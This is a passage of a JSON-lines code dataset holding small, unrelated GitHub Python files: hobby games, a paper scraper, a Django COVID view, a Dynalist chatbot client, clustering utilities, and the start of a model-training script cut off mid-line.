process_input(user_input)\n\t\t\t#system(user_input)\n \t\t#user_input = r.recognize_google(audio)\n \t\t#process_input(user_input)\n\n\t\texcept sr.UnknownValueError:\n\t\t\tprint(\"Could not understand audio\")\n\t\t\tif len(user_input) != 0:\n\t\t\t\tproposedQuestion = process_input(user_input)\n\n\t\texcept sr.RequestError as e:\n\t\t\tprint(\"Could not request results; {0}\".format(e))\n\t\ttry:\n\t\t\tShowTextFrame.grid_forget()\n\t\texcept Exception as e:\n\t\t\tpass\n\n\tfinal = \"Well Thank You \"+ name +\". Your interview has concluded.\" \n\tvoice_out(final,ShowTextFrame)\n\treturn\n\n","repo_name":"ChinmoyJyotiKathar/HumbleFoolCharityHackathon2017","sub_path":"interview_bot/interviewProgram.py","file_name":"interviewProgram.py","file_ext":"py","file_size_in_byte":8145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73176016570","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom serpapi import GoogleSearch\nimport csv\nimport os\nfrom difflib import SequenceMatcher\n\n\ndef calc_similarity(str1, str2):\n \"\"\"\n Calculates the similarity between two strings.\n\n Parameters:\n str1 (str): The first string.\n str2 (str): The second string.\n\n Returns:\n float: The similarity coefficient between the two strings.\n\n \"\"\"\n str1 = str1.strip()\n str2 = str2.strip()\n seq_matcher = SequenceMatcher(None, str1.lower(), str2.lower())\n return seq_matcher.ratio()\n\n\ndef get_paper_titles(url):\n \"\"\"\n Retrieves the titles of articles from a web page.\n\n Parameters:\n url (str): The URL of the web page.\n\n Returns:\n list: A list of dictionaries containing the titles and authors of the articles.\n\n \"\"\"\n # Make a GET request to the URL\n response = requests.get(url)\n\n # Check if the request was successful or not\n if response.status_code == 200:\n print('The request was successful')\n else:\n print('An error occurred while making the request')\n\n # Get the HTML content from the response\n html = BeautifulSoup(response.text, 'html.parser')\n\n # Find all elements in the HTML\n titles = html.find_all('font')\n\n # Initialize a list to store the articles\n papers = []\n\n # Iterate over the found titles\n for title in titles:\n # Find the element that contains the article title\n text = title.find('b')\n\n # Find the element that contains the article author\n author = title.find('i')\n\n # Find all elements that contain related links for the article\n scholar = title.find_all('a')\n\n # Check if the title is not empty and not equal to unwanted values\n if text and text.text.strip() not in ['Abstract:', '[pdf] [scholar]']:\n # Clean and format the article title\n title_paper = text.text.replace(\"\\x92\", \"'\").replace(\n \"\\r\", \" \").replace(\"\\n\", \" \")\n\n # Clean and format the article author\n author = author.text.replace(\"\\x92\", \"'\").replace(\n \"\\r\", \" \").replace(\"\\n\", \" \")\n\n # Add the article to the list\n papers.append({\n 'title': title_paper,\n 'title_google': '-',\n 'author_google': '-',\n 'cited_by': '0',\n 'author': author\n })\n\n # Return the list of articles\n return papers\n\n\ndef search_paper_info(paper_title, api_key):\n \"\"\"\n Searches for information about a paper using the Google Scholar API.\n\n Parameters:\n paper_title (str): The title of the paper.\n api_key (str): The API key for accessing the Google Scholar API.\n\n Returns:\n dict or None: A dictionary containing information about the paper if a match is found, or None if no match is found.\n\n \"\"\"\n # Set the parameters for the API request\n params = {\n \"engine\": \"google_scholar\",\n \"q\": paper_title,\n \"api_key\": api_key\n }\n\n # Create a GoogleSearch instance with the parameters\n search = GoogleSearch(params)\n\n # Perform the search and retrieve the results as a dictionary\n results = search.get_dict()\n\n # Get the organic search results\n organic_results = results[\"organic_results\"]\n\n # Check if there are any organic search results\n if len(organic_results) > 0:\n # Iterate over the organic results\n for result in organic_results:\n # Calculate the similarity between the result title and the paper title\n similarity = calc_similarity(result[\"title\"], paper_title)\n\n # Check if the similarity is above a threshold (e.g., 0.8)\n if similarity > 0.8:\n # Return the matching result\n return result\n\n # If no match is found, return None\n return None\n\n\ndef write_paper_info_to_file(filename, name, papers, api_key):\n \"\"\"\n Writes paper information to a file in CSV format.\n\n Parameters:\n filename (str): The directory path where the file will be created.\n name (str): The name of the file (without extension).\n papers (list): A list of dictionaries containing paper information.\n api_key (str): The API key for accessing the Google Scholar API.\n\n Returns:\n None\n\n \"\"\"\n # Construct the file path\n path_file = filename + \"/\" + name + \".csv\"\n\n # Open the file in write mode\n with open(path_file, mode='w', newline='', encoding='utf-8') as file:\n # Create a CSV writer object\n writer = csv.writer(file)\n\n # Write the header row\n writer.writerow(['title', 'title_google', 'author',\n 'author_google', 'cited_by', 'observation'])\n\n # Iterate over the papers\n for dictionary in papers:\n title = dictionary.get('title')\n title_google = dictionary.get('title_google')\n author = dictionary.get('author')\n author_google = dictionary.get('author_google')\n cited_by = dictionary.get('cited_by')\n observation = '-'\n\n # Search for additional paper information using the Google Scholar API\n paper_info = search_paper_info(title, api_key)\n\n if paper_info:\n # Update the title and author information from the API response\n author_google = paper_info[\"publication_info\"][\"summary\"]\n title_google = paper_info[\"title\"]\n\n try:\n cited_by = paper_info[\"inline_links\"][\"cited_by\"][\"total\"]\n except KeyError:\n cited_by = 0\n else:\n observation = 'not found'\n\n # Write a row of data to the CSV file\n writer.writerow([title, title_google, author,\n author_google, cited_by, observation])\n\n\ndef create_directory(file_name=\"csv\"):\n \"\"\"\n Creates a directory with the specified name if it doesn't exist.\n\n Parameters:\n file_name (str): The name of the directory to be created (default is 'csv').\n\n Returns:\n None\n\n \"\"\"\n # Set the folder name\n folder_name = file_name\n\n # Construct the folder path using the current working directory and the folder name\n folder_path = os.path.join(os.getcwd(), folder_name)\n\n # Check if the folder already exists\n if os.path.exists(folder_path):\n print(\"The folder already exists\")\n else:\n # Create the folder if it doesn't exist\n os.mkdir(folder_path)\n\nconferences_years = ['WER00']\n\n# Constantes\nCONFERENCE_URL = 'http://wer.inf.puc-rio.br/WERpapers/papers_by_conference.lp?conference='\nAPI_KEY = ''\nFILE_NAME = 'csv'\n\nfor name in conferences_years:\n conference_url = CONFERENCE_URL + name\n papers = get_paper_titles(conference_url)\n create_directory(FILE_NAME)\n write_paper_info_to_file(FILE_NAME, name, papers, API_KEY)\n","repo_name":"daniel2019-max/PaperScraper","sub_path":"scrapping.py","file_name":"scrapping.py","file_ext":"py","file_size_in_byte":6976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29343412433","text":"from threading import Thread\r\nimport random\r\n\r\nrandom_number = []\r\n\r\n# generating random number\r\nfor _ in range(15):\r\n random_number.append(random.randrange(50))\r\nprint(f\"random_numbers = {random_number}\")\r\n\r\n\r\ndef print_odd():\r\n odd_numbers = []\r\n # separating odd numbers\r\n for item in random_number:\r\n if item % 2 == 1:\r\n odd_numbers.append(item)\r\n\r\n # printing odd numbers\r\n print(f\"odd_numbers = {odd_numbers}\")\r\n\r\n\r\ndef print_even():\r\n even_numbers = []\r\n # separating even numbers\r\n for item in random_number:\r\n if item % 2 == 0:\r\n even_numbers.append(item)\r\n\r\n # printing odd numbers\r\n print(f\"even_numbers = {even_numbers}\")\r\n\r\n\r\n# creating thread objects\r\nodd_thread = Thread(target=print_odd, name=\"odd\")\r\neven_thread = Thread(target=print_even, name=\"even\")\r\n\r\nodd_thread.start()\r\neven_thread.start()\r\n","repo_name":"Harshil2312/Pythonpracticales","sub_path":"odd_even.py","file_name":"odd_even.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36054561667","text":"from sqlalchemy import create_engine, engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, Session\nimport os\nimport dotenv\n\n\ndotenv.load_dotenv(\".env\")\n\n\ndb_to_connect_to = \"test_db\"\n\nif os.environ['ENV'] == \"prod\":\n db_to_connect_to = \"postgres\"\n\ntry:\n\n SOLDEV_DB = engine.URL.create(\n \"postgresql\",\n username = os.environ['POSTGRE_USER'],\n password = os.environ['POSTGRE_PASS'],\n host = os.environ['POSTGRE_HOST'],\n database = db_to_connect_to\n \n )\n\n\n soldev_engine = create_engine(\n SOLDEV_DB,\n pool_size=40, max_overflow=8, echo=False\n )\n\n Session_ = sessionmaker(autocommit=False, autoflush=False, bind=soldev_engine)\n \n print(\"Connected to\", os.environ['ENV'])\n\nexcept Exception as e:\n print(\"Error making connection: \", e)\n print(\"\\n\")\n\nBase = declarative_base()\n\n\ndef get_db():\n db = Session_()\n \n try:\n yield db\n finally:\n db.close()\n \n\n\n\n","repo_name":"purgatoryforcookies/Helsinki-City-Bike","sub_path":"back/src/internal/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20877180857","text":"import random\r\n\r\nprint(\"Welcome to Rock-Paper-Scissors game!\")\r\n\r\n# list of possible choices\r\nchoices = [\"rock\", \"paper\", \"scissors\"]\r\n\r\nwhile True:\r\n # computer randomly selects a choice\r\n computer_choice = random.choice(choices)\r\n\r\n # ask user to make a choice\r\n user_choice = input(\"Enter your choice (rock/paper/scissors): \")\r\n\r\n # validate user input\r\n if user_choice not in choices:\r\n print(\"Invalid choice, please try again\")\r\n continue\r\n\r\n print(\"You chose:\", user_choice)\r\n print(\"Computer chose:\", computer_choice)\r\n\r\n # check for a tie\r\n if user_choice == computer_choice:\r\n print(\"It's a tie!\")\r\n # check for a win\r\n elif (user_choice == \"rock\" and computer_choice == \"scissors\") or \\\r\n (user_choice == \"paper\" and computer_choice == \"rock\") or \\\r\n (user_choice == \"scissors\" and computer_choice == \"paper\"):\r\n print(\"You win!\")\r\n # otherwise, user loses\r\n else:\r\n print(\"You lose!\")\r\n\r\n # ask user if they want to play again\r\n play_again = input(\"Do you want to play again? (y/n): \")\r\n if play_again.lower() != \"y\":\r\n break\r\n\r\nprint(\"Thanks for playing!\")\r\n\r\n","repo_name":"sohil-khann/projects","sub_path":"rock-paper-scissor-game.py","file_name":"rock-paper-scissor-game.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22816791906","text":"\n\n#Juggling Dog\nimport random\nimport pygame\n\n#initialize pygame\npygame.init()\n\n#GAME CONSTANTS\nGAME_FOLDER = 'D:/python project/game dev/art_of_game_development/game_4/'\nWINDOW_WIDTH = 1300\nWINDOW_HEIGHT = 700\nFPS = 60\nDOG_VELOCITY = 10\nBALL_VELOCITY = 5\nBUFFER_DISTANCE = -200\n\nGOLDEN = pygame.Color(255,201,14)\nRED = pygame.Color(255,0,0)\nBLUE = pygame.Color(0,0,255)\n\nMAX_LIVES = 5\n\n#create a window\ndisplay_surface = pygame.display.set_mode((WINDOW_WIDTH,WINDOW_HEIGHT))\npygame.display.set_caption('Juggling Dog')\n\n#background\nbackground_image = pygame.transform.scale( pygame.image.load(GAME_FOLDER + 'background.png'), (WINDOW_WIDTH, WINDOW_HEIGHT))\npygame.mixer.music.load(GAME_FOLDER + 'background_music.mp3')\npygame.mixer.music.set_volume(0.5)\npygame.mixer.music.play(-1)\n\n#game assets\ndog_left = pygame.image.load(GAME_FOLDER+ 'dog_left.png')\ndog_right = pygame.image.load(GAME_FOLDER+ 'dog_right.png')\ndog = dog_right\ndog_rect = dog.get_rect()\ndog_rect.bottom = WINDOW_HEIGHT\ndog_rect.centerx = WINDOW_WIDTH//2\n\nball = pygame.image.load(GAME_FOLDER + 'ball.png')\nball_rect = ball.get_rect()\nball_rect.top = BUFFER_DISTANCE\nball_rect.left = random.randint(0, WINDOW_WIDTH- ball_rect.width)\n\n#sounds\nloss = pygame.mixer.Sound(GAME_FOLDER + 'loss.wav')\nloss.set_volume(0.5)\nbounce = pygame.mixer.Sound(GAME_FOLDER + 'bounce.mp3')\n\n#game values\nchange_x = 0\nchange_y = BALL_VELOCITY\ncnt =0\ny_multiples = [-1,-1/2,-1/4, 1/4,1/2, 1]\ny_interval = FPS//6\nmultiple_index = 0\nscore = 0\nlives = MAX_LIVES\ngame_status = 1\n\nbounce_ball = False\nrunning = True\nclock = pygame.time.Clock()\n\n#game_texts\ngame_font_big = pygame.font.Font(GAME_FOLDER +'SunnyspellsRegular.otf',60)\ngame_font = pygame.font.Font(GAME_FOLDER +'SunnyspellsRegular.otf', 40)\n\ngame_title = game_font_big.render('Juggling Dog', True, GOLDEN)\ngame_title_rect = game_title.get_rect()\ngame_title_rect.centerx = WINDOW_WIDTH//2\ngame_title_rect.top = 10\n\nplayer_lives = game_font.render('Lives: ' + str(lives), True, GOLDEN)\nplayer_lives_rect = player_lives.get_rect()\nplayer_lives_rect.left = 10\nplayer_lives_rect.top = 10\n\nplayer_score = game_font.render('Score: ' + str(score), True, GOLDEN)\nplayer_score_rect = player_score.get_rect()\nplayer_score_rect.right = WINDOW_WIDTH -10\nplayer_score_rect.top = 10\n\ngame_ends = game_font_big.render('GAME ENDS!!!', True, RED)\ngame_ends_rect = game_ends.get_rect()\ngame_ends_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT//2)\n\ngame_restart = game_font.render('Press r to Restart, q to Quit', True, BLUE)\ngame_restart_rect = game_restart.get_rect()\ngame_restart_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT//2 +60)\n\nmade_by = game_font.render('#NITINYADAVAHIR',True,RED)\nmade_by_react = made_by.get_rect()\nmade_by_react.left = 1050\nmade_by_react.top =657\n\n#main game loop (defines the life of the game)\nwhile running:\n #blit the background\n display_surface.blit(background_image, (0,0))\n display_surface.blit(made_by,made_by_react)\n\n events = pygame.event.get()\n for ev in events:\n if ev.type == pygame.QUIT:\n running = False\n\n if game_status == 1:\n if bounce_ball:\n if cnt < FPS:\n ball_rect.left += change_x #x_path\n ball_rect.top += change_y * y_multiples[multiple_index] #y_path\n cnt+=1\n if cnt % y_interval == 0:\n multiple_index+=1\n else:\n bounce_ball = False\n else:\n ball_rect.top+= change_y\n ball_rect.left += change_x\n\n #continuous key movement\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_LEFT]:\n dog = dog_left\n if dog_rect.left >=0:\n dog_rect.left-= DOG_VELOCITY\n if keys[pygame.K_RIGHT]:\n dog = dog_right\n\n if dog_rect.right <= WINDOW_WIDTH:\n dog_rect.left += DOG_VELOCITY\n\n if dog_rect.colliderect(ball_rect):\n change_x = random.randint(3,6)\n change_y = change_x * 3\n cnt = 0\n multiple_index = 0\n bounce_ball = True\n bounce.play()\n score+=1\n player_score = game_font.render('Score: ' + str(score), True, GOLDEN)\n\n if dog == dog_left:\n change_x = -change_x\n else:\n change_x = +change_x\n\n\n if ball_rect.bottom > WINDOW_HEIGHT:\n loss.play()\n #a new ball should be presented\n ball_rect.top = BUFFER_DISTANCE\n ball_rect.left = random.randint(0, WINDOW_WIDTH- ball_rect.width)\n change_x = 0\n change_y = BALL_VELOCITY\n multiple_index = 0\n lives-=1\n player_lives = game_font.render('Lives: ' + str(lives), True, GOLDEN)\n\n if lives == 0:\n #game ends\n game_status = 2\n pygame.mixer.music.stop()\n\n\n # blit the assets\n display_surface.blit(dog, dog_rect)\n display_surface.blit(ball, ball_rect)\n\n elif game_status == 2:\n display_surface.blit(game_ends, game_ends_rect)\n display_surface.blit(game_restart, game_restart_rect)\n keys = pygame.key.get_pressed()\n if keys[pygame.K_r]:\n change_x = 0\n change_y = BALL_VELOCITY\n cnt = 0\n multiple_index = 0\n score = 0\n player_score = game_font.render('Score: ' + str(score), True, GOLDEN)\n lives = MAX_LIVES\n player_lives = game_font.render('Lives: ' + str(lives), True, GOLDEN)\n game_status = 1\n bounce_ball = False\n pygame.mixer.music.play(-1)\n elif keys[pygame.K_q]:\n running = False\n\n #blit the hud\n display_surface.blit(game_title, game_title_rect)\n display_surface.blit(player_lives, player_lives_rect)\n display_surface.blit(player_score, player_score_rect)\n\n\n #update the display\n pygame.display.update()\n\n #Moderate the loop's iteration rate (cooperative multitasking)\n #Game runs at the same speed over different CPU's\n clock.tick(FPS)\n\n#quit pygame\npygame.quit()","repo_name":"NITINYADAVAHIR/jungllingdog","sub_path":"juggling_dog.py","file_name":"juggling_dog.py","file_ext":"py","file_size_in_byte":6141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19658554369","text":"#!/usr/bin/env python3\n\nfrom math import pi\n\n# calculate\n\nresult = 5 * 5 * pi\n\nresult2 = 5**2 * pi\nr = 5\nr **= 2\nresult3 = pi * r\nprint(result)\n\nprint(result2)\n\nprint(result3)\n","repo_name":"MingGeng/shiyanlou_python_louPlus","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16017886795","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom .models import CasosPorProvincia,DatosCOVID\ndef index(request):\n\n por_provincia = CasosPorProvincia.objects.filter().order_by('-Casos_positivos')\n datos_covid = DatosCOVID.objects.latest('id')\n labe=[]\n color_borde=[]\n color=[]\n cont=255\n cont2=0\n total_positivos =0\n for i in por_provincia:\n labe.append([i.Provincia])\n total_positivos=total_positivos + i.Casos_positivos\n color_borde.append('rgba(' + str(cont) + ', 30,' + str(cont2) + ', 1)')\n color.append('rgba(' + str(cont) + ', 30, ' + str(cont2) + ', 0.3)')\n cont = cont - 10.5\n cont2 = cont2 + 10.5\n\n dict={\n 'positivostotal':total_positivos,\n 'datosprovincia':por_provincia,\n 'datoscovid': datos_covid,\n 'color1': color_borde,\n 'color2': color\n }\n return render(request, 'index.html',dict)","repo_name":"Nemo1710/basedeproyecto2020","sub_path":"covid19/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33080142536","text":"import requests\nimport typing\nfrom bot import Entity\nfrom bot import CAIConversation\nimport phonenumbers\nimport phonenumbers.geocoder\nfrom emojiflags.lookup import lookup\nfrom phonenumbers.phonenumberutil import region_code_for_number\nimport nltk\n\nnltk.download('punkt')\nnltk.download('averaged_perceptron_tagger')\n\nclass DynalistClient:\n \"\"\"This client handles the calls to the dynalist API enpoints\"\"\"\n\n def _call_api(self, cai_conversation, api):\n payload = api.build_api_request(self, conversation=cai_conversation)\n print(payload)\n return requests.post(api.address, json=payload)\n\n def call_check_token_api(self, cai_conversation):\n return self._call_api(cai_conversation=cai_conversation, api=CheckTokenAPI)\n\n def call_inbox_add_api(self, cai_conversation):\n return self._call_api(cai_conversation=cai_conversation, api=InboxAddAPI)\n\n\nclass DynalistApiType:\n address = None\n\n def build_api_request (self, conversation: CAIConversation):\n pass\n\n\nclass CheckTokenAPI(DynalistApiType):\n address = 'https://dynalist.io/api/v1/file/list'\n\n def build_api_request(self, conversation: CAIConversation):\n return {\"token\": conversation.token}\n\n\nclass InboxAddAPI(DynalistApiType):\n address = 'https://dynalist.io/api/v1/inbox/add'\n\n def build_api_request(self, conversation: CAIConversation):\n item = DynalistItem.from_cai_conversation(conversation)\n\n map_entities = {\n 'person': item.format_person,\n 'datetime': item.format_datetime,\n 'location': item.format_location,\n 'email': item.format_email,\n 'phone': item.format_phone,\n 'url': item.format_url\n }\n\n for entity in conversation.entities:\n processing_method = map_entities.get(entity.name)\n if processing_method:\n processing_method(entity)\n\n return {\n \"token\": item.get_token(),\n \"content\": item.get_content(),\n \"note\": item.get_note()\n }\n\n\nclass DynalistItem:\n \"\"\"Building together a note to write down metadata about the message\"\"\"\n\n @classmethod\n def from_cai_conversation(cls, response):\n return DynalistItem(response.channel, response.timestamp, response.contact, response.token, response.message)\n\n def __init__(self, channel: str, timestamp: str, contact: str, token: str, content: str):\n self.channel = channel\n self.timestamp = timestamp\n self.contact = contact\n self.token = token\n self.content = content\n self.note = \"\"\n\n def get_note(self):\n self.build_note()\n return self.note\n\n def build_note(self):\n if self.channel:\n channel_str = self.to_add_tag(self.channel)\n else:\n channel_str = '@' + 'channel'\n time_str = '!(' + self.timestamp + ')'\n if not self.contact:\n contact_str = '@' + 'AContact'\n else:\n contact_str = self.contact\n\n self.note = '#message on {0} from {1} {2}'.format(channel_str, contact_str, time_str)\n\n def get_content(self):\n return self.content\n\n def get_token(self):\n return self.token\n\n def format_person(self, entity: Entity):\n if entity.name == 'person':\n formatted_name = self.to_add_tag(entity.fullname)\n pattern_whatsapp= '[{0}] '\n pattern_custom = ' @ {0}'\n if not self.replace_contact(entity.raw, pattern_whatsapp, formatted_name):\n if not self.replace_contact(entity.raw, pattern_custom, formatted_name):\n self.content = self.content.replace(entity.raw, formatted_name)\n\n def format_datetime(self, entity: Entity):\n if entity.name == 'datetime':\n # return cuttoff index from iso\n accuracy_dict = {\n 'year': 4,\n 'month': 7,\n 'week': 7,\n 'day': 10,\n 'halfday': 10,\n 'hour': 13,\n 'min': 16,\n 'sec': 19,\n 'now': 19\n }\n closest_accuracy = entity.accuracy.rpartition(',')[2]\n formatted_date = entity.iso[:accuracy_dict[closest_accuracy]]\n dynalist_formatted_date = ' (!({0}))'.format(formatted_date)\n self.content = (entity.raw + dynalist_formatted_date).join(self.content.split(entity.raw))\n\n def format_location(self, entity: Entity):\n if entity.name == 'location':\n google_url = 'https://www.google.com/maps/place/?q=place_id:' + entity.place\n self.insert_link_in_content(google_url, entity.raw)\n\n def format_email(self, entity: Entity):\n mail_url = 'mailto:' + entity.raw\n self.insert_link_in_content(mail_url, entity.raw)\n\n def format_phone(self, entity: Entity):\n formatted_number = phonenumbers.parse(entity.number, None, _check_region=False)\n\n if formatted_number.country_code: #international Number provided\n region_code = region_code_for_number(formatted_number)\n flag_emoji = lookup(region_code)\n formatted_number_str = flag_emoji + ' ' + phonenumbers.format_number(formatted_number,\n phonenumbers.PhoneNumberFormat.INTERNATIONAL)\n else:\n formatted_number = phonenumbers.parse(entity.number, 'US')\n formatted_number_str = phonenumbers.format_number(formatted_number, phonenumbers.PhoneNumberFormat.NATIONAL)\n phone_url = 'tel:' + entity.number\n self.insert_link_in_content(phone_url,entity.raw, formatted_number_str)\n\n def format_url(self, entity: Entity):\n tokens = nltk.word_tokenize(self.content)\n tagged_tokens = nltk.pos_tag(tokens)\n determiner = [token for token in tagged_tokens if token[1] == 'DT']\n if determiner:\n determiner_word = determiner[-1][0] #we take the last one as we hope that the last determiner refers to the URL\n #optional find the determiner nearest to the url\n self.content = self.content.replace(\" \" + entity.raw, '')\n self.insert_link_in_content(entity.raw, determiner_word)\n\n else:\n self.insert_link_in_content(entity.raw, entity.raw, entity.host)\n\n def format_distance(self, entity: Entity):\n pass\n\n if entity.unit not in ('km', 'm', 'cm', 'mm'): #metrical units\n format = '{0} {1}/`{2} {3}`'\n metrical_scalar =0\n metrical_unit =0\n self.insert_format_in_content(entity.raw,\n format,\n entity.scalar,\n entity.unit,\n metrical_scalar,\n metrical_unit)\n\n\n\n def insert_link_in_content(self, url: str, raw: str, link_title=None):\n if not link_title:\n link_title = raw\n\n link_format = '[{0}]({1})'\n self.insert_format_in_content(raw, link_format, link_title, url)\n\n def insert_format_in_content(self, raw: str, string_format: str, *parameters):\n left_whitespace_format = ' {0}'\n right_whitespace_format = '{0} '\n left_right_whitespace_format = ' {0} '\n\n if left_right_whitespace_format.format(raw) in self.content:\n string_format = left_right_whitespace_format.format(string_format)\n raw = left_right_whitespace_format.format(raw)\n elif right_whitespace_format.format(raw) in self.content:\n string_format = right_whitespace_format.format(string_format)\n raw = right_whitespace_format.format(raw)\n elif left_whitespace_format.format(raw) in self.content:\n string_format = left_whitespace_format.format(string_format)\n raw = left_whitespace_format.format(raw)\n self.content = (string_format.format(*parameters)).join(self.content.split(raw))\n\n # TODO move to utils\n def to_add_tag(self, tag: str):\n capitalized_words = [x.capitalize() for x in tag.split()]\n capitalized_word = ''.join(capitalized_words)\n channel_str = '@' + capitalized_word\n return channel_str\n\n def replace_contact (self, raw_name: str, pattern: str, name: str):\n if pattern.format(raw_name) in self.content:\n self.content = self.content.replace(pattern.format(raw_name), '')\n self.contact = name\n return True\n return False\n\n\n\n\n\n\n","repo_name":"PoJo93/dynalist-chatbot","sub_path":"bot/dynalist.py","file_name":"dynalist.py","file_ext":"py","file_size_in_byte":8714,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"39116548204","text":"from typing import List, Union\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cluster import KMeans\nfrom tslearn.clustering import TimeSeriesKMeans, KernelKMeans\nfrom tslearn.preprocessing import TimeSeriesResampler\nfrom tslearn.utils import to_time_series_dataset\n\nplt.style.use('seaborn')\n\n\ndef get_train_data(data: pd.DataFrame) -> np.ndarray:\n sessions = data.groupby(\"session_id\")[\"norm_price\"].mean()\n\n X = []\n for index, count in zip(sessions.index, sessions):\n month = data[data.session_id == index].date.unique()[0].month\n X.append([count, month])\n\n return np.array(X)\n\n\ndef plot_clusters(data: np.ndarray, labels: np.ndarray):\n fig, ax = plt.subplots()\n\n colors = list(\"bgrcmykw\")\n\n for i, x in enumerate(data):\n ax.scatter(x[0], x[1], c=colors[labels[i]])\n\n plt.title(\"Кластеризация месячных сессий\")\n plt.xlabel(\"Средняя цена за сессию\")\n plt.ylabel(\"Месяц\")\n\n plt.show()\n\n\ndef get_time_series(data: pd.DataFrame, feature: str) -> List[List[Union[int, float]]]:\n return [value.tolist() for id_, value in data.groupby(\"session_id\")[feature]]\n\n\ndef plot_ts_clusters(cluster_centers: np.ndarray, data: np.ndarray,\n labels: np.ndarray, n_clusters: int, title: str = None):\n plt.figure(figsize=(20, 20))\n plt.suptitle(title)\n\n for yi in range(n_clusters):\n plt.subplot((n_clusters + 1) // 2, 2, 1 + yi)\n\n for xx in data[labels == yi]:\n plt.plot(xx.ravel(), \"k-\", alpha=.2)\n\n plt.plot(cluster_centers[yi].ravel(), \"r-\")\n plt.setp(plt.gca().xaxis.get_majorticklabels(),\n 'rotation', 0)\n plt.title(\"Cluster %d\" % (yi + 1))\n\n plt.show()\n\n\ndef prepare_data(data: pd.DataFrame, feature: str) -> np.ndarray:\n time_series = get_time_series(data, feature)\n train = to_time_series_dataset(time_series)\n train = TimeSeriesResampler(sz=train.shape[1]).fit_transform(train)\n train = np.nan_to_num(train)\n\n return train\n\n\ndef use_ts_kmeans(data: np.ndarray, n_clusters: int, metric: str, seed: int):\n model = TimeSeriesKMeans(n_clusters=n_clusters, metric=metric, random_state=seed)\n y_pred = model.fit_predict(data)\n\n plot_ts_clusters(model.cluster_centers_, data, y_pred, n_clusters)\n\n\ndef use_general_kmeans(data: pd.DataFrame, n_clusters: int):\n X = get_train_data(data)\n kmeans = KMeans(n_clusters=n_clusters).fit(X)\n plot_clusters(X, kmeans.labels_)\n\n\ndef use_kernel_kmeans(data: np.ndarray, n_clusters: int, seed: int):\n gak_km = KernelKMeans(n_clusters=n_clusters,\n kernel=\"cosine\",\n random_state=seed)\n y_pred = gak_km.fit_predict(data)\n\n plt.figure(figsize=(20, 20))\n\n for yi in range(n_clusters):\n plt.subplot((n_clusters + 1) // 2, 2, 1 + yi)\n for xx in data[y_pred == yi]:\n plt.plot(xx.ravel(), \"k-\", alpha=.2)\n plt.title(\"Cluster %d\" % (yi + 1))\n\n plt.tight_layout()\n plt.show()\n","repo_name":"nkarasovd/HSE_Production_Stories","sub_path":"Task_2/clustering_utils.py","file_name":"clustering_utils.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"71917498490","text":"import ipdb\nimport sys\nsys.path.append('/home2/sisodiya.bhoomendra/github/contrastive_learning/src')\nfrom model.model import Transformer_Model\nfrom model.dataset import JudgementDataset\nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader\nfrom torcheval.metrics import BinaryF1Score,BinaryPrecision,BinaryRecall\n\n\nimport torch\nimport yaml\nimport wandb\n\n\ndef pad_batch(x):\n # X is a list of datapoints what we get from Judgement Dataset\n # Size of the list is equal to batch size\n # We will just take the judgements which ha\n # Added padded\n padd = torch.zeros((1,768))\n labels = []\n d1 = []\n d2 = []\n masks = []\n limit = 80\n for v in x:\n x1,x2,l = v # X1 (C,768) X2 (M,768) should become (80,768)\n padd_mask = torch.zeros(162,dtype=torch.bool).to(x1.device)\n nums_padd_1 = limit - x1.shape[0]\n nums_padd_2 = limit - x2.shape[0]\n out1 = torch.cat((x1,padd.repeat((nums_padd_1,1)).to(x1.device)), dim=0)\n out2 = torch.cat((x2,padd.repeat((nums_padd_2,1)).to(x2.device)),dim=0)\n padd_mask[nums_padd_1:limit] = 1\n padd_mask[limit+1+nums_padd_2:] = 1\n masks.append(padd_mask)\n d1.append(out1)\n d2.append(out2)\n labels.append(l)\n x1 = torch.stack(d1)\n x2 = torch.stack(d2)\n labels = torch.stack(labels)\n masks = torch.stack(masks)\n return x1,x2,labels,masks\n\n\ndef train(config):\n # Which model\n # Model config\n # Traning parameters \n # Learning rate , loss , learning rate schedular , optimizer , batch size , number of epochs\n # Early stopping and checkpointing\n # Logging\n # Define collate function in the dataloader\n device = 'cuda'\n wblog = wandb.init(project=\"Precedencer Classification Trasfomer\",config=config)\n train_dataset = JudgementDataset(config=config['dataset'],which='train')\n valid_dataset = JudgementDataset(config=config['dataset'],which='valid')\n # test_dataset = JudgementDataset(config=config['dataset'],which='test')\n # ipdb.set_trace()\n print(f\"Train size: {len(train_dataset)} , Valid size: {len(valid_dataset)} \")#, Test size: {len(test_dataset)}\")\n \n\n train_dataloader = DataLoader(dataset=train_dataset,batch_size=config['model']['batch_size'],shuffle=True,collate_fn=pad_batch)\n # test_dataloader = DataLoader(dataset=test_dataset,batch_size=config['model']['batch_size'],collate_fn=pad_batch)\n valid_dataloader = 